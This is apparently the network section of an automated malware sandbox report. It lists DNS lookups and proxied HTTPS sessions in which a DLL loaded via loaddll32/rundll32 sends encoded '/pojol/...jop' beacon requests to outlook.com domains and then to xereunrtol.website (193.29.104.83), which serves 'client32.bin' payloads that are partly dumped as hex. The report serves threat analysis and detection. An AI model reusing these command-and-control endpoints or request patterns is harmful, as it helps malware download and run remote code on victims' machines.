                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | FRA-efz.ms-acdc.office.com | | 40.101.9.178 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.98.208.66 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | FRA-efz.ms-acdc.office.com | | 40.101.124.194 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.178.98 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.212.242 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.146 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.984483004 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3ac | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.162.2 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:48.005803108 CEST | 8.8.8.8 | 192.168.2.3 | 0xb5e9 | Name error (3) | zereunrtol.website | none | none | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:53.512773037 CEST | 8.8.8.8 | 192.168.2.3 | 0xb38a | Name error (3) | zereunrtol.website | none | none | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:08.080866098 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e0 | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:08.490591049 CEST | 8.8.8.8 | 192.168.2.3 | 0xce86 | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:09.020853043 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b05 | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:14.784287930 CEST | 8.8.8.8 | 192.168.2.3 | 0xe225 | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:15.281104088 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b3f | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:46:15.962352991 CEST | 8.8.8.8 | 192.168.2.3 | 0xe0c0 | No error (0) | xereunrtol.website | | 193.29.104.83 | A (IP address) | IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • outlook.com
                                                          • www.outlook.com
                                                          • outlook.office365.com
                                                          • xereunrtol.website

                                                          HTTPS Proxied Packets

                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          0 | 192.168.2.3 | 49754 | 40.97.156.114 | 443 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          2021-10-08 04:45:27 UTC | 0 | OUT | GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Host: outlook.com
                                                          2021-10-08 04:45:27 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Location: https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop
                                                          Server: Microsoft-IIS/10.0
                                                          request-id: c8680f70-99f5-21cf-5d9f-13fc0054f4c1
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          X-FEServer: CY4PR19CA0027
                                                          X-RequestId: 20ffc107-f9be-44d4-acf7-1c3178300e1f
                                                          MS-CV: cA9oyPWZzyFdnxP8AFT0wQ.0
                                                          X-Powered-By: ASP.NET
                                                          X-FEServer: CY4PR19CA0027
                                                          Date: Fri, 08 Oct 2021 04:45:26 GMT
                                                          Connection: close
                                                          Content-Length: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          1 | 192.168.2.3 | 49755 | 52.98.208.114 | 443 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          2021-10-08 04:45:27 UTC | 1 | OUT | GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Host: www.outlook.com
                                                          2021-10-08 04:45:27 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Location: https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop
                                                          Server: Microsoft-IIS/10.0
                                                          request-id: c507eea6-c1bf-faab-c03a-98e5ad89e4f7
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          X-FEServer: AS9PR06CA0144
                                                          X-RequestId: 123ac631-7653-497b-a35e-a2a6ca739940
                                                          MS-CV: pu4Hxb/Bq/rAOpjlrYnk9w.0
                                                          X-Powered-By: ASP.NET
                                                          X-FEServer: AS9PR06CA0144
                                                          Date: Fri, 08 Oct 2021 04:45:27 GMT
                                                          Connection: close
                                                          Content-Length: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          10 | 192.168.2.3 | 49832 | 193.29.104.83 | 443 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          2021-10-08 04:46:15 UTC | 709 | OUT | GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Host: xereunrtol.website
                                                          2021-10-08 04:46:15 UTC | 710 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.20.1
                                                          Date: Fri, 08 Oct 2021 04:46:15 GMT
                                                          Content-Type: application/zip
                                                          Content-Length: 275595
                                                          Connection: close
                                                          X-Powered-By: PHP/5.4.16
                                                          Set-Cookie: PHPSESSID=9ikufo440gv5p9besq9m8sq5q0; path=/; domain=.xereunrtol.website
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: public
                                                          Pragma: no-cache
                                                          Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:15 GMT; path=/
                                                          Content-Transfer-Encoding: Binary
                                                          Content-Disposition: attachment; filename=client32.bin
                                                          2021-10-08 04:46:15 UTC934INData Raw: 3d b8 21 3f 93 df b6 80 9a db d5 c2 81 24 aa ed 4e db 8e 10 1c 9e fa 48 8b bc 52 76 3c d6 72 e4 34 07 16 d8 44 77 f8 61 9f f4 3c 18 f3 cb 85 9f 28 33 a1 3d 0b 33 f9 d9 be c3 94 5e 39 94 9f 49 78 c8 c6 10 ff 1d d9 bb 26 1e 9a f1 a5 ee b1 cd d0 ee c3 40 82 a8 73 8e d7 a0 e4 54 60 7c ff 97 73 ba b9 cf 08 5e a0 6d c3 fc af 8f 57 4d 62 fd 29 1a 4d 3a 57 0a bd 6b f6 2e 4b 96 9d f4 35 78 97 56 5f e5 63 f9 a6 74 1b 1a e6 45 54 94 c7 b0 1a 1e 86 1e 7b e5 92 cd e8 b7 c1 4b 0e 60 38 cd 38 52 0b 4e d7 db 0f b2 98 d5 7c f7 f8 a0 5b 7f ea a8 ac 8a 0e fa e3 a7 c2 e6 b2 f2 45 8d ad 8d 12 7d 4d f4 6d 7e 6a 03 1b 64 73 05 1b c1 37 16 f7 39 9d 37 19 11 20 b2 de d8 59 2e 77 28 b3 5f d4 2d 6b d1 ac a9 d9 a8 9f 2c fc f5 45 6d fc cc 9f 21 6b 00 ca c2 29 a5 7d 0e 8f 16 17 e4 42
                                                          Data Ascii: =!?$NHRv<r4Dwa<(3=3^9Ix&@sT`|s^mWMb)M:Wk.K5xV_ctET{K`88RN|[E}Mm~jds797 Y.w(_-k,Em!k)}B
                                                          2021-10-08 04:46:15 UTC950INData Raw: 5b 00 e4 59 22 96 1a 50 b6 d5 97 5f 9e a4 a9 32 4e 72 29 6c 38 7e e2 1f a4 e3 fc 1b a5 9b 44 c1 4f 46 00 f6 c9 44 53 66 a1 11 51 ca 3e 37 2e 5d d1 e8 5c e1 a3 9b 6a 06 e9 05 39 2e 45 5e 73 02 d3 64 1d 73 c2 5c 9b a6 c1 f4 72 f1 7a 95 45 f4 8a 38 37 f3 2d 0f d0 0e be 3a 8f 15 9e 88 51 e2 ff 3e 44 0c b2 42 08 69 7f cc 14 60 5a 2b b5 f8 c6 50 50 f0 45 c3 9b 24 ad 64 b1 a0 00 c4 68 a2 fd 29 35 b2 a0 83 c2 c4 62 19 2b ad d5 9a 45 c6 3a 4c cb 4a c1 44 4d 7e 56 7c 75 9f 7c dd 9e f2 7e 7e 50 9b d5 dc a4 77 19 2f bf 10 06 89 1f f7 4d c5 6a 6f 9e c2 e7 58 8c c6 d7 5b 6e 17 31 da 94 be af db 65 60 23 80 27 de c6 81 e9 79 df 7d a6 d5 77 40 0a 83 b0 34 17 2c 5b 24 d1 1f 59 e1 71 70 5d 93 c6 d5 65 f6 99 1d f7 a8 96 74 69 e7 f4 bf 6b 3b 25 12 ec 0f 62 30 0d f2 91 80 bf
                                                          Data Ascii: [Y"P_2Nr)l8~DOFDSfQ>7.]\j9.E^sds\rzE87-:Q>DBi`Z+PPE$dh)5b+E:LJDM~V|u|~~Pw/MjoX[n1e`#'y}w@4,[$Yqp]etik;%b0
                                                          2021-10-08 04:46:15 UTC966INData Raw: 38 db 75 9c 2b 7e ca 69 0d b6 59 a3 6e 2b 20 f4 ab 7d 3b f7 ec 22 2b d3 c9 14 4a 94 79 e6 db c4 de f7 ad 75 21 62 2b b3 31 43 5f 0f 8a d1 94 2f 26 bf c7 ec 69 ab 40 9b bf f7 f5 b1 61 21 f0 70 4a c3 d0 8f 8b ef 4d 6a fc 52 f6 a1 d4 a5 20 16 65 a9 c4 88 a8 4e 8f 35 3e a8 db c1 bc 63 16 29 1c 64 f8 d5 e8 93 bd e5 70 61 70 44 e9 24 ba 15 82 02 50 bc 7d e9 3e 17 ab e3 6a f5 1e 59 46 9e df 03 91 7b 3f 71 fb ae c5 c2 f1 f0 92 3e e3 e4 1d 4d bb 12 46 cb 08 ad af 87 00 cb e9 07 89 10 d9 26 35 78 9b bc e7 fa fe 86 c7 95 96 05 90 bc b3 57 ea 4a fa 4b 3d f9 f3 6c a6 42 d9 39 b4 45 dc c2 4c 31 0c 79 2e 49 ef c6 91 dc 17 a5 8a 4b 6c c4 8e 97 b1 75 c6 06 75 c7 a8 f0 6d 91 cb ab 48 6a 82 df 01 7c ad 79 01 fb 1e 68 6b 3a dd 8a 59 c6 99 11 44 e3 e4 77 be 64 a2 66 a3 73 ea
                                                          Data Ascii: 8u+~iYn+ };"+Jyu!b+1C_/&i@a!pJMjR eN5>c)dpapD$P}>jYF{?q>MF&5xWJK=lB9EL1y.IKluumHj|yhk:YDwdfs


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
11          192.168.2.3  49833        193.29.104.83   443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:46:16 UTC | kBytes transferred: 979 | Direction: OUT
Data:
GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: xereunrtol.website

Timestamp: 2021-10-08 04:46:16 UTC | kBytes transferred: 980 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 08 Oct 2021 04:46:16 GMT
Content-Type: application/zip
Content-Length: 1886
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=ur94qmjop0tiq1lvgjj4eof523; path=/; domain=.xereunrtol.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:16 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.3  49756        52.97.151.18    443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:45:27 UTC | kBytes transferred: 2 | Direction: OUT
Data:
GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com

Timestamp: 2021-10-08 04:45:27 UTC | kBytes transferred: 2 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 973402f4-6725-3934-5235-dbb411665df2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: DB3PR08CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COM
X-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1
X-FEServer: DB3PR08CA0032
X-Powered-By: ASP.NET
X-FEServer: AM6P193CA0099
Date: Fri, 08 Oct 2021 04:45:27 GMT
Connection: close

Timestamp: 2021-10-08 04:45:27 UTC | kBytes transferred: 3 | Direction: IN
Data (ASCII): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.3  49764        40.97.160.2     443               C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-08 04:45:32 UTC | kBytes transferred: 4 | Direction: OUT
Data:
GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com

Timestamp: 2021-10-08 04:45:32 UTC | kBytes transferred: 4 | Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop
Server: Microsoft-IIS/10.0
request-id: 87d2e33b-95da-d4c9-c25c-4e09678ebca6
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR04CA0035
X-RequestId: 12aff652-ce80-4832-b5a7-42d0ddef4cb5
MS-CV: O+PSh9qVydTCXE4JZ468pg.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR04CA0035
Date: Fri, 08 Oct 2021 04:45:31 GMT
Connection: close
Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
4           192.168.2.3  49765        40.101.9.178    443               C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-08 04:45:32 UTC | kBytes transferred: 5 | Direction: OUT
Data:
GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com

Timestamp: 2021-10-08 04:45:32 UTC | kBytes transferred: 6 | Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop
Server: Microsoft-IIS/10.0
request-id: 477b65d1-2bee-3801-5482-8b8691decbee
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AM5PR0201CA0006
X-RequestId: 160cd1b3-5269-4836-b790-c0d1d9f38ad8
MS-CV: 0WV7R+4rAThUgouGkd7L7g.0
X-Powered-By: ASP.NET
X-FEServer: AM5PR0201CA0006
Date: Fri, 08 Oct 2021 04:45:32 GMT
Connection: close
Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.3  49766        52.97.178.98    443               C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-08 04:45:33 UTC | kBytes transferred: 6 | Direction: OUT
Data:
GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com

Timestamp: 2021-10-08 04:45:33 UTC | kBytes transferred: 7 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: DB6P195CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COM
X-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1
X-FEServer: DB6P195CA0005
X-Powered-By: ASP.NET
X-FEServer: AM7PR04CA0006
Date: Fri, 08 Oct 2021 04:45:32 GMT
Connection: close

Timestamp: 2021-10-08 04:45:33 UTC | kBytes transferred: 7 | Direction: IN
Data (ASCII): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
6           192.168.2.3  49828        193.29.104.83   443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:46:08 UTC | kBytes transferred: 9 | Direction: OUT
Data:
GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: xereunrtol.website

Timestamp: 2021-10-08 04:46:08 UTC | kBytes transferred: 9 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 08 Oct 2021 04:46:08 GMT
Content-Type: application/zip
Content-Length: 218248
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=rg37m2v4eae0s9i2qusopebch4; path=/; domain=.xereunrtol.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:08 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                                                          Data Ascii: _#Xeb\-bqP'V^)eRPT1-V+,qD7y:9-@dvTPvmIuzN/1{<8yC>,[uNTk"+U{uzE3Aqugl a(}XXP@!\RsO+".Z)}';Q4.|abum"./BE
                                                          2021-10-08 04:46:08 UTC169INData Raw: 17 76 76 00 8e 69 e7 50 e7 2a aa 8b 13 8d 95 a3 bc 99 e7 2e bb 2d 9d d5 59 97 81 31 a3 ab 1b a8 b4 04 f4 9a d7 df 21 73 99 c5 a1 89 df 8f 0b 47 67 31 06 f5 b9 c4 18 57 5e 75 07 ab bb da 95 73 92 99 f6 f0 2f bd 9f c9 58 76 f4 1f d7 af c6 c6 e2 a4 7e e6 bf 32 96 a7 19 7f 94 76 3b ef 5d 01 59 c6 a4 6a ce d6 87 dc a8 65 19 ae 7c a1 34 bf ab 60 e3 dc 57 bd 34 21 d5 ed 6e 39 19 9d 0c e7 0f b1 5d 32 61 2b 3d 54 04 a8 d0 33 68 eb 34 4e 8a 91 22 f5 ce 28 4c be fc 1d a3 7e 54 cd 94 7d fe 9c 61 36 f6 59 8b d8 1f ef 19 a5 27 72 1f 65 89 a5 58 7e 10 47 2d 2b 82 4b 0f ff b0 1c 7e 28 b6 2d de 32 08 f9 39 c7 5d 3b f0 18 a8 ca d4 ef aa f9 6d cb e8 9b 94 d9 9f a2 5a f1 fd 8c ed 3b 72 01 33 3f b1 d9 90 be 32 0e 9b 0b 12 55 46 e4 d3 b6 d6 5f 0d 24 88 8c 14 3b 02 fe 44 e9 b8
                                                          Data Ascii: vviP*.-Y1!sGg1W^us/Xv~2v;]Yje|4`W4!n9]2a+=T3h4N"(L~T}a6Y'reX~G-+K~(-29];mZ;r3?2UF_$;D
                                                          2021-10-08 04:46:08 UTC185INData Raw: b2 75 c2 d9 30 e3 9c a9 d2 44 ce a8 c3 51 b7 4f 11 e2 fe d9 e3 85 36 ea d2 35 54 58 04 5b f2 87 6e 9b 60 78 c0 bd bd 43 75 d4 c0 9f 9e cc 1e e5 28 10 c3 a3 c7 74 20 28 47 3c 59 6d 62 e2 5a 9b c0 c9 88 ac 31 bb 82 01 23 d8 f5 8c c0 55 a2 cc 56 cc 2b 88 6d 1d a2 85 76 de 24 4b 06 c4 00 c5 f6 d2 f9 3c 03 8e 7a d7 fc c7 e1 82 0f b6 32 9a e1 08 02 8d 7c 0b 26 da 60 b9 b2 fc df db 60 a9 a5 ed 9c b7 16 cc 43 95 e7 60 59 53 21 09 0b 50 41 31 9e fa cf 17 ff 31 0c 55 30 e4 b1 ac a4 16 68 a1 17 da e3 65 54 89 ec 18 8f 34 21 84 01 bf f4 67 42 fc 3b 3b 91 22 de c3 c4 b3 87 48 be 4f 28 de 3a 9e f0 af bc dc 8d 71 7f bd 77 25 4e 7f b3 82 e0 70 4b d1 36 2f b0 d9 4a c1 60 38 f5 6d 25 a0 d6 94 aa e9 2b 7c d2 0f e1 16 d6 bd 3c 70 e2 18 b1 68 ac c4 49 68 c6 7e ba f8 df 6c 10
